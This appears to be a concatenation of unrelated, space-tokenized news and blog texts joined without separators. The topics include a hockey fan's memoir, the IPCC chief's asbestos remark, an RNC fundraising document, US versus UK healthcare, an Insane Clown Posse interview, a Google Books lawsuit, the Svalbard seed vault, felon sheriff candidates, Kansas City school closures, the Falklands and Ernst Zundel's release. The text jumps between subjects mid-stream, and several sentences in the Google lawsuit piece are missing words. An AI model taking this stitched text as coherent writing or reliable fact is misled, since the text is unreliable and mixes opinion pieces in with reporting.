Sometimes , it'd just be me and one other kid , in which case we'd take turns playing goal and have a best - of - 7 shootout , the winner getting to skate around with our make shift Stanley Cup - a Blues souvenir cup taped to a plastic bowl .
Every now and then , this guy who lived next door to my friend - and who used to play for the River Otters - would come out and join us !
I followed the Blues closely the next year .
I remember The Greatest Comeback in NHL HistoryTM in Toronto .
I remember the Tkachuk trade .
And I remember where I was when Bryce Salvador scored in OT of Game 5 against the Sharks in the first round ( once again watching alone in my basement ) .
And then , just after Christmas in ' 01 , my mother had a talk with me and my sister .
She told us that they'd be trying a separation .
I was rather blank for a while , but I escaped by watching the Blues and the Rams ( luckily it was a good time to be a Rams fan - I do n't know what I 'd do if it 'd happened today ) .
He did move back in on New Year 's Eve , without much fanfare , and stayed for a while .
I remember sitting as a family stunned when the Rams lost Super Bowl XXXVI - all five of us ( my father , mother , grandma , sister , and I ) were completely silent for nearly fifteen minutes .
That may have been the last real moment we ever had as a family .
I 've Always Depended on the Kindness of Strangers
Before he did eventually move out for good , though , we went to Game 5 of that year 's first round series with the Blackhawks - we clinched that night , booed the out - of town updates of the Sharks and Redwings winning , both Prongs and Mac scored , we got tacos ( god , I miss those 35 cent tacos ! ) , Brent Johnson 's nearly three - game shutout streak ended to a standing ovation , and the Hawks fans in the building went home with their tails between their legs , having to sit in traffic listening to a few thousand cars honking in the streets !
( I tried to convince my dad to join them , but he would n't )
But what I remember most about that game was a woman sitting next to my dad .
He was still having trouble understanding the game ( especially offsides and icing ) , so this woman tried to explain it to him .
She was n't very successful , but she tried .
I have a feeling someone at a Rams game would n't have wasted their breath , and though a Cardinals fan might have , they'd be just as likely to simply turn to the person on their other side for their in - game conversation .
Hockey had already captured my heart - now hockey fans had , too .
Darkest Before the Dawn
A few years later came the dark times .
The Lockout was hell for me at first , until I sadly got used to the void left by the NHL .
But the biggest blow to my fandom came in August of 2005 .
It was appropriately a dreary , rainy day when I picked up the paper that day - the Blues had traded Chris Pronger .
Once I read that - especially the quote in the article where Pleau had admitted he had just traded away " the best defenseman in the league " - I knew harder days were ahead .
I still followed the team in the standings , but rare was the day that I 'd watch a game on TV .
Until one summer night in '08 .
I was up late watching TV and was about to go to sleep , when out of nowhere , I had a strange urge to watch and / or play hockey .
I started watching old Blues highlights on YouTube : The Monday Night Miracle , Dan Kelly calls , Hull and Oates , 50 - in - 50 , CuJo vs. Cheveldae , the St. Patrick 's Day Massacre , BEELLLLLL -FFFOOOOOUUURRR , everything !
Next thing I knew , it was almost 7 am !
That fall , I bought a ticket to the home opener against the Preds , a 5 - 2 domination .
I knew that the Blues were probably still at least a year or two away from contending , but I kept watching them every chance I got through thick and thin last year and this ( and , as we all know , there were a lot of both the last two years ) .
Along the way , I discovered SLGT , and have been a devoted reader for nearly a year now .
Unfortunately , I 'm unable to share this new found love with my dad .
I did get to go to a game with him last year ( Stempniak 's last home game as a Blue , btw ) , but he still seemed as lost as ever .
He 's had some health issues the past few years , but he 's still going .
I only get to see him a few times a year , now , since I 'm away at college and occasionally travelling around ( last summer I spent two weeks in China and most of the rest in North Carolina ) and he has trouble just paying his bills .
In fact , in the past 10 months , I 've gotten more chain text messages from him than I have actual , face - to - face conversations .
All in all , it may have taken me a while , but I love hockey .
I love the chill in the arena .
I love the crisp sounds of the game - the cutting of the blades on the ice , the smack of the perfect slapshot , the crash of a great check into the boards .
I love the bonds between the fans , even of different teams .
I love the pure hatred in a great rivalry - " Fuck " and " Detroit " were among my most common words used in my Facebook status updates in 2009 .
I love the history of the game , even if I 'm still learning ( what the fuck 's a ' rover ? ' ) .
I love the speed of the game , which even at it 's slowest still brings back memories of The Greatest Show on Turf , which conversely brings back memories of my family being together and happy .
But most of all , I love the Blues .
Some of the reactions are great .
The U.N. 's climate chief dismissed " nefarious " global warming skeptics this week by insinuating that they are deep in the pockets of big business -- and suggested that they go rub their faces in cancer - causing asbestos .
Rajendra Pachauri , the besieged head of the U.N. 's International Panel on Climate Change , told the Financial Times on Wednesday that he is the victim of a " carefully orchestrated " campaign to block climate change legislation .
" I would say [ there are ] nefarious designs behind people trying to attack me with lies , falsehoods , " he told the paper , swatting away allegations that his India - based climate institute , TERI , has benefited from decisions made by the IPCC , which he also chairs .
Climate change skeptics " are people who deny the link between smoking and cancer ; they are people who say that asbestos is as good as talcum powder , " he said .
" I hope that they apply it ( asbestos ) to their faces every day . "
Pachauri 's remarks came as pressure and scrutiny are mounting against the IPCC 's hallmark Fourth Assessment Report , which laid out the case for man-made climate change over a thousand sprawling pages .
The report contained misleading data about the melting rate of glaciers in the Himalayas and is riddled with citations to data furnished by activist groups , non-scientific journals and material that was never peer - reviewed .
Pachauri called the furor over errors in the assessment report " a blip that is going to pass , " and reiterated his intention to remain in place as the chief of the world 's most powerful climate body .
" I 'm not a quitter .
Some people would want me to be ; some people would probably say that I should go , but I am not going to oblige them .
I have no desire to leave at all , " he said .
His critics in the business world , he told the paper , " see climate change as a threat to their own comforts , their own convenience and the generation of easy profits . "
He accused them of establishing a network of lobbyists in D.C. " trying to write all kinds of malicious articles and indulge in invective . "
" It 's all part of a pattern , " he continued .
" But let me clarify .
I have no proof .
I can only presume something like this is at work . "
Click here to read the entire interview at the Financial Times .
The Republican party 's national organising committee was furiously backpedalling after an embarrassing document lampooning Barack Obama and other Democratic leaders as ' evil ' was found in a hotel room .
The PowerPoint document , reported by the Washington news website Politico , was delivered by the Republican National Committee 's head of fundraising to a closed meeting of select party officials and major donors held in Boca Grande , Florida , last month .
In discussing how to motivate donors to give , a section of the presentation is headlined " The Evil Empire " and carries a picture of Barack Obama made up to look like Heath Ledger 's portrayal of the Joker in the Batman movie The Dark Knight .
Democratic party congressional leaders Nancy Pelosi and Harry Reid are also caricatured as Cruella DeVille and Scooby Doo .
Politico said that the 72 - page document was sent to it by a Democrat , who found the original in the hotel where the meeting was held .
on 18 February .
Sources at the event said a presentation involving the document was given by the RNC 's finance director Rob Bickhart and finance chairman Peter Terpeluk , who was ambassador to Luxembourg under the Bush administration .
The document also contained a wealth of embarrassing details about Republican fundraising tactics .
Politico reported : " The small donors who are the targets of direct marketing are described under the heading ' Visceral Giving . '
Their motivations are listed as ' fear ; ' ' Extreme negative feelings toward existing Administration ; ' and ' Reactionary . ' "
The document also mentions the $ 80,000 ( £ 53,000 ) price tag for donors wanting to join an official RNC visit to meet British Conservative party leader David Cameron in September – after the UK general election , when Republicans hope he will be Britain 's prime minister .
The Republican party sought to distance itself from the memo , with an RNC spokesman saying : " Fundraising documents are often controversial " .
Its statement also said that Michael Steele , the party 's chairman , " disagrees with the language and finds the use of such imagery to be unacceptable .
It will not be used by the Republican National Committee – in any capacity – in the future . "
Raynard Jackson , a Republican activist who works to attract blacks and other minority members to the party , told the Washington Post that he was outraged by the presentation : " And the best we can get is Michael Steele issuing a statement through a spokesman ?
And they wonder why they can't get minorities , especially black people , involved in the party ? "
source Sculpture from the William Ricketts sanctuary
It was an incredible place , William Ricketts ( 1898 - 1993 ) was an Australian potter and sculptor of the arts and crafts movement .
His incredible works opened the eyes of Australians to the beauty of the land and the real raw nature of " wild life " and its essence .
The Sanctuary was a real eye opener to the possibilities of spiritual artwork .
Hidden deep within a lush Australian rainforest are a set of mystical Aborigine sculptures seemingly merged into the natural surroundings .
Moss covered torsos of men , women and children protrude from tree trunks and boulders .
Some reach heavenward with widespread wings , others envelop each other protectively – all are symbols of the relationship the indigenous Australian Aborigines have with nature .
source
source
source
source
source
source
source
source
source
source
source
source
source Tweet
Finally responding to Jill ’s call for taking the phrase “ April Showers Brings May Flowers ” and showing what it means to me .
In Cincinnati it is a well known fact that if you do n’t have allergies when you get here , that you will once you stay for a while .
Pollen season is going like gangbusters here already and my eyes are a little itchy .
And do n’t forget to vote for the caption cartoon contest .
Now I do n't really have a say in any of this ; I have no vote , no representation ( despite taxation ) .
So you guys need to decide what you want for yourselves .
But I can maybe do you a favour by telling you a little bit of what it 's like on both sides of the socialized medicine wall .
Let me tell you a tale of two healthcares .
Apparently something earth - shaking happened yesterday .
Something about US healthcare .
Finally , the world -- or the USA at least -- is going to be fine .
To paraphrase Annie Lennox :
First , the US
About six weeks ago , I visited my local physician to ask if he thought it was worthwhile me taking up some yoga .
I have chronic lower back problems , starting in my late teens , via an L4/L5 discectomy ( repairing a " slipped " disc ) in 1995 , and with pretty much constant low - level pain to the present day .
The pain means I do n't move my back as much as I maybe should , so I 'm very stiff , especially on my left side .
So I was considering yoga as a way of strengthening my core , and improving my flexibility .
I simply dropped in on the physician -- no appointment needed .
I was seen within 15 minutes .
During the visit , I had the usual obligatory chat with the nurse first , including a BP check , and then I sat for about 20 minutes in a private office watching the telly while waiting for the doc .
She arrived and we had a chat .
She recommended that since it had been so long ( 15 years ) since I 'd seen an orthopedic surgeon , perhaps I should go see one now .
She reckoned yoga would be fine , but why not ask the expert .
To finish off , she asked me a few other questions , including " do you have any chest pains " .
" Sure " , I replied .
She did a double - take and asked more urgently , " chest pains ? " " Sure " I said again , " on and off " .
Within five minutes another paramedic came in and they got ready for a quick EKG .
Despite that being clear , she recommended a visit to a cardiologist .
So I left the physician 's office with the phone numbers of two specialists .
I made the calls and got appointments to see them both , within a week .
Each required a followup visit -- the orthopedist for an MRI scan ; the cardiologist for a stress test .
Those were scheduled ; again , about another week .
Then another week later , back in to see the specialists for their final verdicts .
Those were : my L4/L5 disc is pretty much shot to bits ( which I knew ) , and my heart is fine .
Summary .
In the space of about a month I saw , a physician , two surgeons , several paramedics , over the course of about seven different appointments .
All quick , efficient , and on my terms .
But then again , some are not so lucky .
OK , now the UK .
At about the same time I visited my doc , a close member of my family over in the UK visited his , to see about a hernia .
The hernia confirmed , his appointment -- the initial appointment -- to see the consultant was in 12 weeks .
He is still waiting .
But then again , no one is any better .
Conclusion ?
People , people , people ; there is no such thing as a free lunch .
Socialized medicine has the benefits of equality , but do n't let anyone tell you it comes for free .
The cost will be apparent in your day - to - day interactions with your healthcare .
Longer waits ; bleaker and more worn facilities , overworked physicians who treat you not like paying customers but like subjects in an empire even they do n't control .
You 'll see it not only in your own treatment but in that of your kids .
Your little girl , sobbing because she has something in her eye , will have to stand in line because some bozo got into a fight in a bar and is taking up the doctor 's time , and there 's nothing you can do but write to your Member of Parliament .
I do n't know that there 's compelling evidence that US healthcare is objectively better , in the sense that it lengthens life , or increases quality thereof , but it feels better .
For , of course , those who can afford it .
Death panels in the UK's NHS ?
Of course there are death panels in such a socialized system .
Now they 're not called that because that 's not really what they are about .
But when the pricing mechanism is not allowed to divert resources from where they are not wanted and able to be paid for to where they are , then something else has to do the job .
Why would anyone be surprised at that ?
Year - long waiting lists ?
Of course .
I got my MRI scan in a week .
Back in the UK , another relative waited 13 months for an MRI scan for sciatic pain .
13 months .
But why the surprise ?
When you offer goods at effectively zero price , do n't be amazed when the demand rockets .
And uninsured poor people and kids ?
Of course there are none .
That 's what all the hassle buys you .
You just have to decide what you want .
If you are of average middle - class wealth , it 's a simple choice .
Equality , or speed and efficiency .
Pick one .
Insane Clown
Posse get it — the Detroit rap group is aware that people have been laughing at the video for “ Miracles , ” their earnest new single about the various wonders of life .
With its mystical CG imagery and aggressive shout - outs to rainbows , the pyramids , giraffes , and magnets ( “ how do they work ? ” ) , “ Miracles ” was instant fodder for online ridicule and a Saturday Night Live parody .
But ICP is n’t letting the hate get to them .
Speaking over the phone from Detroit , Violent J said he mostly feels let down that people can’t recognize all the magic around us .
He also discussed the Posse ’s beefs with Eminem and Martin Bashir .
Everyone ’s talking about “ Miracles . ”
What ’s the story behind the song and concept ?
People that have listened to us for a while know that we ’ve always included one , sometimes three , deep , meaningful songs on our records .
So the style itself is n’t anything new for ICP , it ’s just the first time we ever made a video for one .
The concept is about appreciating everything in this world .
It ’s not about God ; it ’s not about religion ; it ’s not 100 percent about science , even .
These things are just beautiful things ; they ’re like miracles .
How do you feel about some of the hate you ’ve been getting for it ?
I think that hate maybe comes from our misunderstanding of the word “ miracles . ”
I ’ve always thought a miracle was something awesome , like a great happening or an awesome event .
And I guess it really means something that cannot be scientifically explained .
So maybe we were a little loose with the word , ‘ cause everyone seems to pick on the fact that a lot of the things we mention are not , in fact , miracles .
But they ’re totally missing the point of the song :
It ’s just about appreciating those things .
For example , a long - necked giraffe .
A giraffe may not actually be a miracle according to the books , but I took my daughter and my son to the zoo last fall and we fed a giraffe .
Let me tell you something — a giraffe is a fucking miracle .
If you ’ve never stood next to a fucking yellow - ass giraffe with a long neck , looking like a fucking dinosaur , it ’s just an amazing sight .
To me , all the negative comments people say about the “ Miracles ” video , it does n’t make us angry because we ’ve always been the most hated band in the world .
But it makes me sad that people walk around unable to appreciate that shit .
It makes me feel sorry for them .
Did you see Saturday Night Live parody ?
That was funny .
I can appreciate that .
Seeing two clowns rap about outer space and shit , and floating around what looks like a bunch of screen savers or something .
I can appreciate how someone who is n’t familiar with the band could find it funny .
I get it .
But for people who know the band , I think [ our ] song is cool .
It ’s talking about things you can appreciate on this Earth .
Let ’s say there ’s no God .
Let ’s say nature put us on this Earth .
It ’s still incredible .
We could have been born inside of a rock , eating algae off the fucking walls .
But instead we were born on this incredible planet , with all its secrets and mysteries .
We can go anywhere we want .
We can go underwater .
We can go in the air .
If you stop , open your eyes and look around , there ’s just a lot of cool shit here , man .
Like rainbows .
I know it ’s not a “ miracle . ”
It can be explained .
But when you see an awesome rainbow , who does n’t point it out and say , “ look at the rainbow . ”
It ’s a beam of color stretching across the sky .
You guys were interviewed on Nightline last month .
What are your thoughts on how the piece turned out ?
I hated how it turned out .
It ’s like , here ’s this respectable , American journalism show .
You ’re supposed to trust what they say .
But they were lying on us .
With the editing , they even took my response from one question and put it to another question .
I took Martin Bashir on the bus , I introduced him to my family , we fully explained to him that we ’re entertainers , we ’re not really murderers .
We sat down with him for an hour that day , and I have a good feeling that we changed his mind about the whole thing .
But even if we did , they were still going to paint that picture .
It was scary , because if Nightline will lie , it seems like everybody will .
Insane Clown Posse had beef with Eminem a few years ago .
Was there ever a reconciliation ?
There was , before Eminem ’s hype man Proof passed away .
He reached out to us .
That was really , really , really fucking cool .
I guess Proof had wanted to kill all the beef they had with everybody , including us .
And ICP ’s so different , they could have just said “ fuck them , ” but Proof included us .
So in private , in Detroit , we had this bowling match .
It was ICP versus D12 .
Eminem was n’t there , but Proof and them were there , and then we went out hanging and drinking that night .
We never spoke to Eminem , we never officially shook his hand or squashed the beef , but we did so through Proof .
I do n’t think we ’re Eminem ’s favorite band , and we ’re definitely not his favorite rapper .
If I heard he was down the street buying ice cream , I ’m not gonna run down there to see him , but there ’s no beef .
Several photography groups on Wednesday filed a class- action lawsuit against Google , accusing the search engine giant of illegally scanning books that include copyrighted images for its Google Books project .
Several photography groups on Wednesday filed a class- action lawsuit against Google , accusing the search engine giant of illegally scanning books that include copyrighted images for its Google Books project .
The American Society of Media Photographers ( ASMP ) , joined by four other groups , four photographers , and two illustrators , filed their suit after a judge denied their request to join a $ 125 million class - action settlement announced in 2008 .
" Through this suit , we are fulfilling the missions of our organizations and standing up for the rights of photographers and other visual artists who have been excluded from the process up to now , " Eugene Mopsik , ASMP executive director , said in a statement .
" We strongly believe that our members and those of other organizations , whose livelihoods are significantly and negatively impacted , deserve to have representation in this landmark issue . "
Victor Perlman , ASMP 's general counsel , said the parties are " seeking justice and fair compensation for visual artists whose work appears in 12 million books and other publications Google has illegally scanned to date . "
" In doing so , we are giving voice to thousands of disenfranchised creators of visual artworks whose rights we hope to enforce through this class action , " Perlman said .
Google denied any wrongdoing and said it is " confident that Google Books is fully compliant with international copyright law . "
" Google Books is an historic effort to make all of the knowledge contained within the world 's books searchable online , " a spokesperson said in an e-mail .
" It exposes readers to information they might not otherwise see , and it provides authors and publishers with a new way to be found . "
Other parties to the lawsuit include the Graphic Artists Guild , the Picture Archive Council of America , the North American Nature Photography Association , Professional Photographers of America , photographers Leif Skoogfors , Al Satterwhite , Morton Beebe , Ed Kashi , and illustrators John Schmelzer and Simms Taback .
The issue dates back to 2004 , when Google partnered with major university libraries to scan their collections and make them available on the Internet .
The Association of American Publishers ( AAP ) and the Author 's Guild sued Google for copyright infringement in 2005 .
In October 2008 , the two sides that would create a registry of online books , and allow U.S. consumers and institutions to purchase access to that material .
The settlement has faced opposition , however .
In September 2009 , the Department of Justice Google 's book deal , so Google and content groups in November .
While the DOJ said the new deal included several improvements , the agency that it still had problems with class certification , copyright and antitrust issues .
In a remote mountainside on the Norwegian tundra sits the " doomsday vault , " a backup against disaster -- manmade or otherwise .
Inside lives the last hope should the unthinkable occur : a global seedbank that could be used to replant the world .
It 's a modern day Noah 's Ark , in other words , full not of animals but of plantlife .
The Vault is dug into the Platåberget or plateau mountain near the village of Longyearbyen , Svalbard -- a group of islands north of mainland Norway .
The arctic permafrost offers natural freezing for the seeds , while additional cooling brings the temperatures down to minus 0.4 degrees Fahrenheit .
Should disaster wipe out a species -- or in the case of a large - scale global crisis -- its stockers hope the seeds stored there could be used to restore life .
This week , the Global Crop Diversity Trust that protects and stocks the vault tucked away new seeds in this modern - day Noah 's Ark : mold - resistant beans , a German pink tomato and a wild strawberry plucked from the flanks of a Russian volcano .
With these new deposits , the Svalbard " doomsday " Global Seed Vault will store a half - million seed varieties .
The Vault is kept safe by its remote location , for one thing .
But if the mountain of snow enshrouding the storage rooms is n't enough protection , what better body guard than one of nature 's biggest beasts ?
" The region on Svalbard surrounding the Seed Vault is remote , severe , and inhabited by polar bears , " according to the Global Crop Diversity Trust , which helps to support the vault 's operations .
The preciousness of the seeds there is also reflected in the inaccessible nature of the vault .
" Anyone seeking access to the seeds themselves will have to pass through four locked doors : the heavy steel entrance doors , a second door approximately 115 meters down the tunnel and finally the two keyed air - locked doors , " the Trust writes .
" Keys are coded to allow access to different levels of the facility .
Not all keys unlock all doors . "
Other seedbanks in in Iraq and Afghanistan were destroyed by war , while a bank in the Philippines was flooded by the tremendous typhoon in 2006 .
The Svalbard bank is designed to survive earthquakes and even nuclear strikes .
That it contains such a wealth of seeds is a tremendous achievement .
" Reaching the half - million mark brings mixed emotions , because while it shows that the vault at Svalbard is now the gold standard for diversity , it comes at a time when our agriculture systems are really sitting on a knife 's edge , " said Cary Fowler , executive director of the Global Crop Diversity Trust , which partners with the Norwegian government and the Nordic Genetic Resource Center in Sweden in operating the vault .
Fowler added , " If crops and agriculture do n't adapt to climate change , neither will humanity . "
Like all seeds coming to the vault , the new ones are duplicates of those from other collections .
Material directly acquired by plant breeders to develop disease - resistant and " climate - ready " crops , and to meet the challenge of rapidly growing populations , is maintained by genebanks , not the seed vault .
" Svalbard is a fail - safe backup to be used whenever a depositing seed bank loses part or all of its collection , but we should focus equally on averting the disasters in the first place , " Fowler said .
Other seeds shipped to the doomsday vault include : semi-dwarf wheat and rice from the early 1960s ; disease - resistant soybeans ; and the German pink tomato , a hardy sweet - flavored tomato transported to Iowa in 1883 by a Bavarian immigrant .
" We 're seeing in several of the soybean varieties intriguing traits that could allow farmers to confront such problems as drought or extreme heat , shorter or longer growing seasons , or higher levels of CO2 [ carbon dioxide ] , " said Dave Ellis , curator at the U.S. Department of Agriculture , National Center for Genetic Resources Preservation .
The giant icebox of sorts officially opened on Feb. 26 , 2008 .
Copyright © 2010 LiveScience.com .
All Rights Reserved .
This material may not be published , broadcast , rewritten or redistributed .
— For 10 years , Gerald Hege was arguably one of the most well - known sheriffs in the country .
From his pink jail cells to prison work crews dressed in old fashioned black and white stripes , the sheriff in Davidson County was a regular on national television shows .
A hot sauce was even named after him .
Then the man known for driving a black police car adorned with spider images got caught in a web himself .
In 2004 , Hege pleaded guilty to two felony counts of obstruction of justice .
The plea deal kept him out of jail , but cost him his job .
Six years later ,
Hege is running for sheriff again , but there is a catch : State law prohibits a convicted felon , including Hege , from carrying a weapon .
He is not the only candidate with a criminal past running for the office of sheriff across the state :
In Avery County , candidate Robert Nub Taylor was convicted of obstruction of justice as a clerk of court .
McDowell County ’s Mark Stewart and Cleveland County candidate David Morrow each have felony drug convictions .
Wilkes County candidate Willie
Tharpe has a felony conviction for receiving stolen goods .
Former Washington County Sheriff Stanley James was convicted of embezzling , but is running this year in an effort to reclaim the position .
Ryan
White , a candidate for sheriff in Dare County , has pending felony drug charges in two counties .
“ The gun issue is not our primary motivating factor .
It ’s an ethics issue , ” said Eddie Caldwell , spokesman for the North Carolina Sheriff ’s Association .
The NCSA is pushing for a bill in the state legislature to keep felons from becoming sheriff .
Salvation ’s
Way is also campaigning against the felon candidates .
“ The constitutional qualifications are not our main focus , " said Melisia Prout , head of the group .
" It ’s the statutory qualifications you can not get around .
The fact that a convicted felon cannot be in care or control of a firearm , that statue does not say unless elected sheriff . "
Hege said he does n’t need to carry a gun to hold the office .
“ There ’s no general statute that I ’m aware of that requires a sheriff to carry a firearm .
The president of the United States do n’t carry one .
The governor do n’t carry one , so I do n’t think one sheriff not carrying one is going to upset anybody , " he said .
Please keep in mind that our polls are for entertainment and are not conducted in a scientific fashion .
We make no guarantees about the accuracy of the results other than that they reflect the choices of the users who participated .
Rights for felons
What rights should be allowed to those convicted of a felony ?
Vote
Carry a gun
Work in law enforcement
Hold public office
All of the above
None of the above
See Results Disclaimer
What rights should be allowed to those convicted of a felony ?
Hege ’s opponents argue that the sheriff is actually in charge of the guns carried by more than 140 Davidson County deputies .
Hege says it 's a stretch to say he can't even be around firearms .
“ I do n’t know of any statute that says a felon can not be around a firearm .
I mean , I go to Walmart all the time , ” Hege said .
“ Walmart has guns .
I go to Walmart .
Convicted felons go there everyday . ”
The Davidson County Board of Elections will hold a full hearing after the May primary to rule on Hege 's eligibility .
“ Regulations in North Carolina prohibit a convicted felon from becoming a deputy sheriff or any other law enforcement officer in our state , ” Caldwell said .
“ The sheriffs believe that same standard that applies to the deputies ought to also apply to the office of sheriff . ”
The state Senate will consider a bill in the upcoming session of the General Assembly to ban felons from running for sheriff .
If the bill passes , the issue would appear on voter ballots in November .
Twenty - nine out of 61 Kansas City , Missouri , schools will soon be shuttered in a desperate bid by the struggling school district to stave off bankruptcy .
At the same time , close to one - quarter of the city 's school employees will lose their jobs .
While many districts around the country are closing under - enrolled - in or low - performing schools in an effort to save money , the scale of KC 's decision puts it in a league of its own .
Students around the city will be disrupted by the changes , as they lose teachers , have to travel further to school each morning , and possibly see their class sizes grow .
The number of students in Kansas City 's public schools – 18,000 – would indicate that it is a small town .
But there 's not much that 's small about Kansas City .
In fact , the core of the city , which is Missouri 's largest urban hub , has nearly half a million residents , and the broader metro area is home to approximately 2 million people .
Yet for decades its public schools have been in crisis and have haemorrhaged students .
For 26 years , Kansas City was under the largest court - ordered desegregation plan in American education history .
At first this provided an opportunity to improve the system , injecting $ 2bn into local schools .
But over time the benefits unleashed by the case were undermined by opposing demographic and political trends : Kansas City was bedeviled by white flight ; and , eventually , it saw a near - total exodus of the middle classes , of all colours , into suburban school districts , charter schools and private schools .
A few years ago , eight schools went so far as to secede from the school district , joining a suburban district that provided more resources to students .
By the time the desegregation case ended , in 2003 , the city was no longer discriminating against African American students ; but at the same time it was increasingly unable to provide quality public school education to any student .
It had become a poster - child for educational dysfunction .
As a result , the schools that remained under the jurisdiction of the Kansas City school district saw their enrollment shrink by about 75 % in recent decades , even as the region 's total population has grown .
A number of schools were more than half - empty .
In many ways , Kansas City represents the depressing end - point I warned about last week in my article on California 's education cuts : a setting in which those with options have exercised them by opting out of the state school system , leaving the rump public sector both shrivelled and denuded of influential supporters in the community .
This week 's decision to downsize the system by close to 50 % might well be the least bad option remaining to the board of education in the city given these harsh realities ; but necessity does n't make these truths any less depressing .
If there are lessons to be learned from Kansas City 's dismal experiences , they are about the importance of holistic thinking : of looking for ways not just to desegregate schools but to preserve integrated , economically diverse urban cores ; of providing middle - class families with reasons to continue using public services ; of building up the notion of common community again so that the public sector flourishes rather than withers .
Absent this , Kansas City might well represent a glimpse of a depressing American future : one in which those with resources opt out , en masse , from any and all public services , leaving the public sector to stumble drunkenly from one crisis to the next , a miserable - looking shadow of once - great glories .
' We will not be bullied by you , Old Plastic Face ' , says a sixth generation Falkland Islander
Stalking the islands : President Cristina Fernandez de Kirchner
At a meeting of Falkland sheep farmers , held in a Stanley business boardroom last week , a burly chap wearing a check shirt and pair of well - worn sheep shearing strides grumbled to colleagues .
Fellow farmers were ‘ swanning off ’ in pursuit of extra cash by offering tours to visiting cruise ship tourists ‘ when they should be bloody well staying on their own farms and fattening lambs for the abattoir ’ .
His amiable colleague leaned across , patted him comfortingly on the shoulder and wryly assured him : ‘ Cruise ships wo n’t be a problem now mate – the Argies have sorted that one for yer . ’
The handsome but craggy faces of the group of weather - beaten young farmers lit up with amusement at the positive spin on Argentina ’s latest attempt to hinder the Falklands ’ economy .
But underneath , no one was underestimating the potential seriousness of the situation .
At about the same time , President Cristina Fernandez de Kirchner ( or ‘ old plastic face ’ as Falkland Islanders refer to her following reports in Buenos Aires that her looks are surgically enhanced ) decreed that ‘ prior approval ’ will be required for ships sailing between the coast of Argentina and waters claimed by it , and the Falkland Islands .
Cruise ship tourism is the second - largest contributor to the Falklands ’ economy and , worryingly , many ships begin their Falklands / Antarctic adventure in the Argentine port of Ushuaia .
If Argentina insists on permits for ships en route to the Falklands , the opportunity exists for them to refuse or delay the vessels .
Surprisingly , Ushuaia is just as perturbed by the announcement .
The Argentinian newspaper based in that region , El Diario del Fin del Mundo , ran an article on Friday expressing concern that their commercial interests could be damaged by the requirements .
With eight cruise liners due to sail between Ushuaia and the Falklands before the season closes at the end of March , the article ’s author asked : ‘ Who will be issuing licences ? ’
For Falkland Islanders in general , the decree was n’t a particularly startling piece of news , for Argentina has been attempting to tear down the Falklands ’ economy for many years .
Thus it was comforting to read some of the rather pugnacious responses to the situation by the British Press this week .
' Argentina is its own worst enemy as well as ours '
Their patriotic and custodial stance was everything a small and vulnerable overseas territory might hope for and Tony Curran , the editor of our newspaper ( The Penguin News , what else would we call it ? ) wrote : ‘ Perhaps one of the better outcomes of recent days has been renewed interest from the UK media in Falklands ’ affairs . ’
At the same time , the shock / horror reaction also emphasised how little the British public understands our current situation , that such victimisation from our much larger neighbour is an everyday occurrence .
Since the 1982 war , a time I remember well as a frightened 12 - year - old farmer ’s daughter , the Falklands ’ economy has grown hearty from the sale of squid fishing licences to a plethora of calamari - loving countries such as Korea , Spain , China and Taiwan .
The fishery income has transformed Stanley from an increasingly rickety little community , with a rapidly reducing population into an attractive town that boasts a modern school , a tourist visitor centre , hundreds of recently constructed brightly painted houses , and groups of trendy iPod- clutching teenagers on every corner .
But how does our neighbour from hell harass us ?
All ships sailing between the Argentine coast and the Falklands must hold a permit
Just for starters , while the country ’s authorities currently ‘ allow ’ a weekly commercial flight between Chile and the islands ( one that has no option but to travel through Argentine air - space ) , they have banned charter flights to the Falklands .
These were invaluable and most often used for cruise ship passenger exchanges and the carriage of freight .
We Falkland Islanders are particularly fond of our relationship with our benign neighbour Chile – and we do n’t want to lose it .
A substantial Chilean community has grown in the Falklands ; we work and socialise together and there ’s no better ending to a night out than attending a lively Chilean party , dancing to reggaeton [ Latin hip - hop ] or grinding to salsa .
Unfortunately , interrupting the link between our countries is just as much of a priority for Argentina .
Purely for a bit of sport the Argentine authorities insist that if a scheduled flight is delayed for any reason – bad weather , perhaps – then a permit must be issued for the aircraft to travel another day through their airspace .
The Argentine decree is likely to deepen a row over conflicting claims to oil beds lying inside the Falkland Islands ' territorial waters
Of course the Falklands ’ biggest industry has less to do with visitors and everything to do with the unlovely but highly lucrative squid .
Not surprisingly the Argentine government is perfectly aware of this , and has spent recent years doing all it can to damage the Falklands ’ primary money - spinner – the sale of the fishing licences .
In recent years Argentina informed the international fishing industry that if they insisted on purchasing Falklands ’ licences they would not be welcome in Argentina ’s substantially larger fishing zone .
As far as I am aware this has n’t actually turned out to be a massive problem in itself .
Business is business after all , and if Korean , Chinese and Spanish fishing vessels hear rumours ( or perhaps it involves technology ; cephalopod chasing is n’t my area of expertise ) insisting the squid is in the Falklands ’ zone then they seem to follow them regardless .
And we ’ve heard if they fancy an Argentine licence the following year , they simply reflag the ship , change a few letters in its name and paint it pink instead of purple .
Again I ca n’t swear to it but they ’re a canny lot .
Argentina 's authorities currently ' allow ' a weekly commercial flight between Chile and the islands but they have banned charter flights to the Falklands
Sadly the problem does n’t end there .
If it were in fact possible to build a nice big wall all the way around the Falklands and its fishing zone , life would be just fine .
But sharing the sea with Argentina means suffering their unashamed and irresponsible attitude towards the fish stocks .
While we pay out a fortune in equipment and personnel to monitor fish stocks , and end the fishing season early if things are looking bad , Argentina refuses to co-operate and play the sustainability game .
It is its own worst enemy , as well as ours .
Argentina has cruise ship visitors and we have cruise ship visitors , they have squid and we have squid , and yet they seem willing to upset things for themselves in order that the Falklands suffer the consequences .
A great deal of their time seems to be spent demanding that our representatives be expelled from international conferences on everything from oil and agriculture to tourism and fisheries .
I might say that I would rather our neighbour causes us to live in fear of our livelihoods than our lives .
But for all our determination to live life serenely in spite of this insistent persecution , it can be a wearying existence when every brave step towards self - sufficiency is dogged by the stalker in the shadows .
Longtime Hitler enthusiast and Holocaust denier Ernst Zundel was released from a German prison on Monday after serving five years for the crime of inciting racial hatred .
Zundel , who turns 71 next month , said he would be heading to his home in the Black Forest to regain his health .
“ It ’s kind of a sad situation , ” he told The Associated Press as a small group of supporters greeted him outside a Mannheim prison .
Thus ends a long legal saga that began in 1977 when the German - born Zundel founded a small publishing house in Canada called Samisdat Publishers .
He published books such as The Hitler We Loved and Why ( which he co-authored under a pseudonym ) and Did Six Million Really Die ? and distributed Nazi and neo -Nazi posters , audiotapes and other items .
Among the countries where Zundel sent his offerings was Germany , which has laws prohibiting Holocaust denial and dissemination of Nazi and neo -Nazi material .
It also was during the 1970s that Zundel was spokesman for Concerned Parents of German Descent , a group that contended that German Canadians and their children were discriminated against by anti-German stereotyping .
